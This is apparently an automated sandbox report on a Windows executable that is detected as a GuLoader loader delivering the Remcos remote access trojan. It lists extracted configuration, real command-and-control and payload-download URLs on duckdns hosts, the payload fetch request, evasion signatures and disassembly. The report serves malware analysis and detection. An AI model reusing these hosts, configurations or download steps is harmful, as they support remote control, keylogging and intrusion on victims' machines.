Loading ...

Play interactive tourEdit tour

Windows Analysis Report DW1VgsgHNU.exe

Overview

General Information

Sample Name:DW1VgsgHNU.exe
Analysis ID:491400
MD5:b30b9c1d23026ff24f234a07a557dc83
SHA1:044ceea8b2fb554e2fdd7bcf4d695dded3a58d3b
SHA256:c54b1a3af48ef7f70434b9e90c33b4bcdccfbd20339d8164e34957890c67f888
Tags:exeRemcosRAT
Infos:

Most interesting Screenshot:

Detection

GuLoader Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Potential malicious icon found
Multi AV Scanner detection for submitted file
GuLoader behavior detected
Yara detected Remcos RAT
Yara detected GuLoader
Hides threads from debuggers
Tries to detect Any.run
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Uses dynamic DNS services
Uses 32bit PE files
Sample file is different than original file name gathered from version info
PE file contains strange resources
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Detected TCP or UDP traffic on non-standard ports
Internet Provider seen in connection with other malware
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
IP address seen in connection with other malware
Abnormal high CPU Usage

Classification

Process Tree

  • System is w10x64
  • DW1VgsgHNU.exe (PID: 6420 cmdline: 'C:\Users\user\Desktop\DW1VgsgHNU.exe' MD5: B30B9C1D23026FF24F234A07A557DC83)
    • DW1VgsgHNU.exe (PID: 2800 cmdline: 'C:\Users\user\Desktop\DW1VgsgHNU.exe' MD5: B30B9C1D23026FF24F234A07A557DC83)
  • cleanup

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "dyn-wave.duckdns.org:1144:1dyn-wave.duckdns.org:2404:0", "Assigned name": "RemoteHost_NEW", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Remcos-2LBKGP", "Keylog flag": "0", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "notepad;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "20000"}

Threatname: GuLoader

{"Payload URL": "http://dypage.duckdns.org/remcos_d_QUBXVO174"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000019.00000002.767385154.0000000000948000.00000004.00000020.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000001.00000002.499884696.00000000005A0000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      Process Memory Space: DW1VgsgHNU.exe PID: 2800JoeSecurity_RemcosYara detected Remcos RATJoe Security

        Sigma Overview

        No Sigma rule has matched

        Jbx Signature Overview

        Click to jump to signature section

        Show All Signature Results

        AV Detection:

        barindex
        Found malware configurationShow sources
        Source: 00000019.00000002.767385154.0000000000948000.00000004.00000020.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "dyn-wave.duckdns.org:1144:1dyn-wave.duckdns.org:2404:0", "Assigned name": "RemoteHost_NEW", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Remcos-2LBKGP", "Keylog flag": "0", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "notepad;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "20000"}
        Source: 00000001.00000002.499884696.00000000005A0000.00000040.00000001.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "http://dypage.duckdns.org/remcos_d_QUBXVO174"}
        Multi AV Scanner detection for submitted fileShow sources
        Source: DW1VgsgHNU.exeVirustotal: Detection: 20%Perma Link
        Yara detected Remcos RATShow sources
        Source: Yara matchFile source: 00000019.00000002.767385154.0000000000948000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: DW1VgsgHNU.exe PID: 2800, type: MEMORYSTR
        Machine Learning detection for sampleShow sources
        Source: DW1VgsgHNU.exeJoe Sandbox ML: detected
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exeCode function: 1_2_00402520 CryptDestroyHash,
        Source: DW1VgsgHNU.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

        Networking:

        barindex
        C2 URLs / IPs found in malware configurationShow sources
        Source: Malware configuration extractorURLs: dyn-wave.duckdns.org
        Source: Malware configuration extractorURLs: http://dypage.duckdns.org/remcos_d_QUBXVO174
        Uses dynamic DNS servicesShow sources
        Source: unknownDNS query: name: dypage.duckdns.org
        Source: unknownDNS query: name: dyn-wave.duckdns.org
        Source: global trafficHTTP traffic detected: GET /remcos_d_QUBXVO174.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: dypage.duckdns.orgCache-Control: no-cache
        Source: global trafficTCP traffic: 192.168.2.7:49893 -> 23.146.241.70:1144
        Source: Joe Sandbox ViewASN Name: VDI-NETWORKUS VDI-NETWORKUS
        Source: Joe Sandbox ViewASN Name: VDI-NETWORKUS VDI-NETWORKUS
        Source: Joe Sandbox ViewIP Address: 23.146.242.85 23.146.242.85
        Source: DW1VgsgHNU.exe, 00000019.00000002.767385154.0000000000948000.00000004.00000020.sdmpString found in binary or memory: http://dypage.duckdns.org/remcos_d_QUBXVO174.bin
        Source: DW1VgsgHNU.exe, 00000019.00000002.767385154.0000000000948000.00000004.00000020.sdmpString found in binary or memory: http://dypage.duckdns.org/remcos_d_QUBXVO174.binD
        Source: DW1VgsgHNU.exe, 00000019.00000002.767385154.0000000000948000.00000004.00000020.sdmpString found in binary or memory: http://dypage.duckdns.org/remcos_d_QUBXVO174.binE
        Source: unknownDNS traffic detected: queries for: dypage.duckdns.org
        Source: global trafficHTTP traffic detected: GET /remcos_d_QUBXVO174.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: dypage.duckdns.orgCache-Control: no-cache

        E-Banking Fraud:

        barindex
        Yara detected Remcos RATShow sources
        Source: Yara matchFile source: 00000019.00000002.767385154.0000000000948000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: DW1VgsgHNU.exe PID: 2800, type: MEMORYSTR

        System Summary:

        barindex
        Potential malicious icon foundShow sources
        Source: initial sampleIcon embedded in PE file: bad icon match: 20047c7c70f0e004
        Source: DW1VgsgHNU.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
        Source: DW1VgsgHNU.exe, 00000001.00000000.242528368.000000000042D000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameSrklasse4.exe vs DW1VgsgHNU.exe
        Source: DW1VgsgHNU.exe, 00000019.00000000.498515700.000000000042D000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameSrklasse4.exe vs DW1VgsgHNU.exe
        Source: DW1VgsgHNU.exeBinary or memory string: OriginalFilenameSrklasse4.exe vs DW1VgsgHNU.exe
        Source: DW1VgsgHNU.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exeCode function: 25_2_0056EED3 Sleep,NtProtectVirtualMemory,
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exeCode function: 25_2_0056ED3B NtProtectVirtualMemory,
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exeCode function: 25_2_0056EDD4 NtProtectVirtualMemory,
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exeCode function: 25_2_0056ED50 NtProtectVirtualMemory,
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exeCode function: 25_2_0056EF19 NtProtectVirtualMemory,
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exeCode function: 25_2_0056ED2E NtProtectVirtualMemory,
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exeProcess Stats: CPU usage > 98%
        Source: DW1VgsgHNU.exeVirustotal: Detection: 20%
        Source: DW1VgsgHNU.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
        Source: unknownProcess created: C:\Users\user\Desktop\DW1VgsgHNU.exe 'C:\Users\user\Desktop\DW1VgsgHNU.exe'
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exeProcess created: C:\Users\user\Desktop\DW1VgsgHNU.exe 'C:\Users\user\Desktop\DW1VgsgHNU.exe'
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exeProcess created: C:\Users\user\Desktop\DW1VgsgHNU.exe 'C:\Users\user\Desktop\DW1VgsgHNU.exe'
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exeMutant created: \Sessions\1\BaseNamedObjects\Remcos-2LBKGP
        Source: classification engineClassification label: mal100.rans.troj.evad.winEXE@3/0@2/2
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior

        Data Obfuscation:

        barindex
        Yara detected GuLoaderShow sources
        Source: Yara matchFile source: 00000001.00000002.499884696.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exeCode function: 1_2_00409ABA pushad ; iretd
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exeCode function: 1_2_00407B13 push ecx; retf
        Source: initial sampleStatic PE information: section name: .text entropy: 6.92804161947
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exeProcess information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion:

        barindex
        Tries to detect Any.runShow sources
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exeFile opened: C:\Program Files\qga\qga.exe
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exeFile opened: C:\Program Files\qga\qga.exe
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exeSystem information queried: ModuleInformation
        Source: DW1VgsgHNU.exe, 00000019.00000002.767758753.00000000009A1000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
        Source: DW1VgsgHNU.exe, 00000019.00000002.767758753.00000000009A1000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW,

        Anti Debugging:

        barindex
        Hides threads from debuggersShow sources
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exeThread information set: HideFromDebugger
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exeThread information set: HideFromDebugger
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exeProcess created: C:\Users\user\Desktop\DW1VgsgHNU.exe 'C:\Users\user\Desktop\DW1VgsgHNU.exe'
        Source: DW1VgsgHNU.exe, 00000019.00000002.768074297.0000000000ED0000.00000002.00020000.sdmpBinary or memory string: uProgram Manager
        Source: DW1VgsgHNU.exe, 00000019.00000002.767385154.0000000000948000.00000004.00000020.sdmpBinary or memory string: Program Manager
        Source: DW1VgsgHNU.exe, 00000019.00000002.768074297.0000000000ED0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
        Source: DW1VgsgHNU.exe, 00000019.00000002.768074297.0000000000ED0000.00000002.00020000.sdmpBinary or memory string: Progman
        Source: DW1VgsgHNU.exe, 00000019.00000002.768074297.0000000000ED0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
        Source: DW1VgsgHNU.exe, 00000019.00000002.767758753.00000000009A1000.00000004.00000020.sdmpBinary or memory string: |Program Manager|
        Source: DW1VgsgHNU.exe, 00000019.00000002.767385154.0000000000948000.00000004.00000020.sdmpBinary or memory string: Program ManagerY

        Stealing of Sensitive Information:

        barindex
        GuLoader behavior detectedShow sources
        Source: Initial fileSignature Results: GuLoader behavior
        Yara detected Remcos RATShow sources
        Source: Yara matchFile source: 00000019.00000002.767385154.0000000000948000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: DW1VgsgHNU.exe PID: 2800, type: MEMORYSTR

        Remote Access Functionality:

        barindex
        Yara detected Remcos RATShow sources
        Source: Yara matchFile source: 00000019.00000002.767385154.0000000000948000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: DW1VgsgHNU.exe PID: 2800, type: MEMORYSTR

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid AccountsWindows Management InstrumentationPath InterceptionProcess Injection12Virtualization/Sandbox Evasion2OS Credential DumpingSecurity Software Discovery21Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection12LSASS MemoryVirtualization/Sandbox Evasion2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information2Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing1NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsSystem Information Discovery2SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol212Manipulate Device CommunicationManipulate App Store Rankings or Ratings

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        DW1VgsgHNU.exe20%VirustotalBrowse
        DW1VgsgHNU.exe100%Joe Sandbox ML

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        http://dypage.duckdns.org/remcos_d_QUBXVO174.bin0%Avira URL Cloudsafe
        dyn-wave.duckdns.org0%Avira URL Cloudsafe
        http://dypage.duckdns.org/remcos_d_QUBXVO174.binE0%Avira URL Cloudsafe
        http://dypage.duckdns.org/remcos_d_QUBXVO174.binD0%Avira URL Cloudsafe
        http://dypage.duckdns.org/remcos_d_QUBXVO1740%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        dypage.duckdns.org
        23.146.242.85
        truetrue
          unknown
          dyn-wave.duckdns.org
          23.146.241.70
          truetrue
            unknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://dypage.duckdns.org/remcos_d_QUBXVO174.binfalse
            • Avira URL Cloud: safe
            unknown
            dyn-wave.duckdns.orgtrue
            • Avira URL Cloud: safe
            unknown
            http://dypage.duckdns.org/remcos_d_QUBXVO174true
            • Avira URL Cloud: safe
            unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://dypage.duckdns.org/remcos_d_QUBXVO174.binEDW1VgsgHNU.exe, 00000019.00000002.767385154.0000000000948000.00000004.00000020.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://dypage.duckdns.org/remcos_d_QUBXVO174.binDDW1VgsgHNU.exe, 00000019.00000002.767385154.0000000000948000.00000004.00000020.sdmpfalse
            • Avira URL Cloud: safe
            unknown

            Contacted IPs

            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs

            Public

            IPDomainCountryFlagASNASN NameMalicious
            23.146.241.70
            dyn-wave.duckdns.orgReserved
            46664VDI-NETWORKUStrue
            23.146.242.85
            dypage.duckdns.orgReserved
            46664VDI-NETWORKUStrue

            General Information

            Joe Sandbox Version:33.0.0 White Diamond
            Analysis ID:491400
            Start date:27.09.2021
            Start time:14:52:48
            Joe Sandbox Product:CloudBasic
            Overall analysis duration:0h 8m 40s
            Hypervisor based Inspection enabled:false
            Report type:light
            Sample file name:DW1VgsgHNU.exe
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
            Number of analysed new started processes analysed:29
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • HDC enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Detection:MAL
            Classification:mal100.rans.troj.evad.winEXE@3/0@2/2
            EGA Information:Failed
            HDC Information:
            • Successful, ratio: 73.1% (good quality ratio 35.6%)
            • Quality average: 25.5%
            • Quality standard deviation: 32.4%
            HCA Information:Failed
            Cookbook Comments:
            • Adjust boot time
            • Enable AMSI
            • Found application associated with file extension: .exe
            • Override analysis time to 240s for sample files taking high CPU consumption
            Warnings:
            Show All
            • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
            • TCP Packets have been reduced to 100
            • Excluded IPs from analysis (whitelisted): 23.54.113.53, 95.100.54.203, 20.82.209.183, 20.54.110.249, 40.112.88.60, 23.10.249.26, 23.10.249.43, 20.82.210.154
            • Excluded domains from analysis (whitelisted): iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.useroor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
            • Not all processes where analyzed, report is missing behavior information
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.

            Simulations

            Behavior and APIs

            No simulations

            Joe Sandbox View / Context

            IPs

            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
            23.146.241.707HHrcwZjLI.exeGet hashmaliciousBrowse
              23.146.242.857HHrcwZjLI.exeGet hashmaliciousBrowse
              • dypage.duckdns.org/remcos_d_QUBXVO174.bin
              466XoziOLD.exeGet hashmaliciousBrowse
              • sopage.duckdns.org/Remcos_s_bChlcwVW46.bin
              hVlpEajflR.exeGet hashmaliciousBrowse
              • spage.duckdns.org/Remcos_S_tGNeLX139.bin
              0rUkHCgvVf.exeGet hashmaliciousBrowse
              • dpage.duckdns.org/remcos_d_fIqfwC80.bin
              JQPFEy9Ekx.exeGet hashmaliciousBrowse
              • dyn-bin.duckdns.org/remcos_d_fIqfwC80.bin
              http___sowork.duckdns.org_11d_solex.exeGet hashmaliciousBrowse
              • sol-bin.duckdns.org/Remcos_S_tGNeLX139.bin

              Domains

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              dypage.duckdns.org7HHrcwZjLI.exeGet hashmaliciousBrowse
              • 23.146.242.85
              dyn-wave.duckdns.org7HHrcwZjLI.exeGet hashmaliciousBrowse
              • 23.146.241.70

              ASN

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              VDI-NETWORKUS7HHrcwZjLI.exeGet hashmaliciousBrowse
              • 23.146.242.85
              466XoziOLD.exeGet hashmaliciousBrowse
              • 23.146.242.85
              hVlpEajflR.exeGet hashmaliciousBrowse
              • 23.146.242.85
              0rUkHCgvVf.exeGet hashmaliciousBrowse
              • 23.146.242.85
              HxXHmM0T9f.exeGet hashmaliciousBrowse
              • 23.146.242.147
              JQPFEy9Ekx.exeGet hashmaliciousBrowse
              • 23.146.242.85
              http___sowork.duckdns.org_11d_solex.exeGet hashmaliciousBrowse
              • 23.146.242.85
              eXik5mFvet.exeGet hashmaliciousBrowse
              • 23.146.242.94
              CVEXzxk43s.exeGet hashmaliciousBrowse
              • 23.146.242.94
              yOCBr7SNLJ.exeGet hashmaliciousBrowse
              • 23.146.242.94
              13FlI4deWN.exeGet hashmaliciousBrowse
              • 23.146.242.94
              Payment Notification.exeGet hashmaliciousBrowse
              • 23.146.242.147
              Payment Notification.scr.exeGet hashmaliciousBrowse
              • 23.146.242.147
              Payment Notification.scr.exeGet hashmaliciousBrowse
              • 23.146.242.147
              Request For Quotation.jarGet hashmaliciousBrowse
              • 23.146.242.147
              OvBS76pTyX.exeGet hashmaliciousBrowse
              • 23.146.242.94
              U6lqJJBG8S.exeGet hashmaliciousBrowse
              • 23.146.242.94
              pNyAinWdWJ.exeGet hashmaliciousBrowse
              • 23.146.242.94
              YTVrQC7FhG.exeGet hashmaliciousBrowse
              • 23.146.242.94
              I4eRfFgJG7.exeGet hashmaliciousBrowse
              • 23.146.242.94
              VDI-NETWORKUS7HHrcwZjLI.exeGet hashmaliciousBrowse
              • 23.146.242.85
              466XoziOLD.exeGet hashmaliciousBrowse
              • 23.146.242.85
              hVlpEajflR.exeGet hashmaliciousBrowse
              • 23.146.242.85
              0rUkHCgvVf.exeGet hashmaliciousBrowse
              • 23.146.242.85
              HxXHmM0T9f.exeGet hashmaliciousBrowse
              • 23.146.242.147
              JQPFEy9Ekx.exeGet hashmaliciousBrowse
              • 23.146.242.85
              http___sowork.duckdns.org_11d_solex.exeGet hashmaliciousBrowse
              • 23.146.242.85
              eXik5mFvet.exeGet hashmaliciousBrowse
              • 23.146.242.94
              CVEXzxk43s.exeGet hashmaliciousBrowse
              • 23.146.242.94
              yOCBr7SNLJ.exeGet hashmaliciousBrowse
              • 23.146.242.94
              13FlI4deWN.exeGet hashmaliciousBrowse
              • 23.146.242.94
              Payment Notification.exeGet hashmaliciousBrowse
              • 23.146.242.147
              Payment Notification.scr.exeGet hashmaliciousBrowse
              • 23.146.242.147
              Payment Notification.scr.exeGet hashmaliciousBrowse
              • 23.146.242.147
              Request For Quotation.jarGet hashmaliciousBrowse
              • 23.146.242.147
              OvBS76pTyX.exeGet hashmaliciousBrowse
              • 23.146.242.94
              U6lqJJBG8S.exeGet hashmaliciousBrowse
              • 23.146.242.94
              pNyAinWdWJ.exeGet hashmaliciousBrowse
              • 23.146.242.94
              YTVrQC7FhG.exeGet hashmaliciousBrowse
              • 23.146.242.94
              I4eRfFgJG7.exeGet hashmaliciousBrowse
              • 23.146.242.94

              JA3 Fingerprints

              No context

              Dropped Files

              No context

              Created / dropped Files

              No created / dropped files found

              Static File Info

              General

              File type:PE32 executable (GUI) Intel 80386, for MS Windows
              Entropy (8bit):6.693618961961531
              TrID:
              • Win32 Executable (generic) a (10002005/4) 99.15%
              • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
              • Generic Win/DOS Executable (2004/3) 0.02%
              • DOS Executable Generic (2002/1) 0.02%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:DW1VgsgHNU.exe
              File size:184320
              MD5:b30b9c1d23026ff24f234a07a557dc83
              SHA1:044ceea8b2fb554e2fdd7bcf4d695dded3a58d3b
              SHA256:c54b1a3af48ef7f70434b9e90c33b4bcdccfbd20339d8164e34957890c67f888
              SHA512:80f9e5c0df30a6937450a35531b5be188c98a911703c30064575b1f6707ebeed98643f0166e689fa54ee5e17c232b9825fcdc6d13cb62ad89f22ef6883124bc3
              SSDEEP:3072:aTN6q3h21LWcznBUcxYIBpafjJJUB/yu0d/eWjUUqdj/WHA:aTyttVBwbbGyjeWjp
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L.....xH.....................0......`.............@................

              File Icon

              Icon Hash:20047c7c70f0e004

              Static PE Info

              General

              Entrypoint:0x401460
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
              DLL Characteristics:
              Time Stamp:0x487895E2 [Sat Jul 12 11:30:42 2008 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:4
              OS Version Minor:0
              File Version Major:4
              File Version Minor:0
              Subsystem Version Major:4
              Subsystem Version Minor:0
              Import Hash:831c9926df4754b736e1ca092f4fb7e7

              Entrypoint Preview

              Instruction
              push 004016B8h
              call 00007FE2A8EDA4F3h
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              xor byte ptr [eax], al
              add byte ptr [eax], al
              dec eax
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], dl
              test byte ptr [edx-47h], cl
              or eax, dword ptr [edx+eax*2-2B734EBAh]
              cld
              xchg eax, esp
              fsubr dword ptr [esi+0000003Dh]
              add byte ptr [eax], al
              add byte ptr [ecx], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax+71h], bl
              push cs
              add eax, dword ptr [ecx+52h]
              inc ebp
              inc ecx
              dec esp
              inc edx
              inc ebp
              push edx
              inc ebp
              inc edi
              dec esi
              dec ecx
              dec esi
              inc edi
              inc ebp
              dec esi
              add byte ptr [edi], al
              inc ecx
              add byte ptr [ecx+esi*2+0000030Eh], cl
              add byte ptr [eax], al
              dec esp
              xor dword ptr [eax], eax
              add esp, dword ptr [ebx+7E6E97A6h]
              mov ebp, E69A43FEh
              jbe 00007FE2A8EDA524h
              adc byte ptr [ebx+26886F8Bh], ah
              xor dword ptr [edi+37h], esp
              jnle 00007FE2A8EDA544h
              nop
              adc eax, 398128CEh
              salc
              cmp cl, byte ptr [edi-53h]
              xor ebx, dword ptr [ecx-48EE309Ah]
              or al, 00h
              stosb
              add byte ptr [eax-2Dh], ah
              xchg eax, ebx
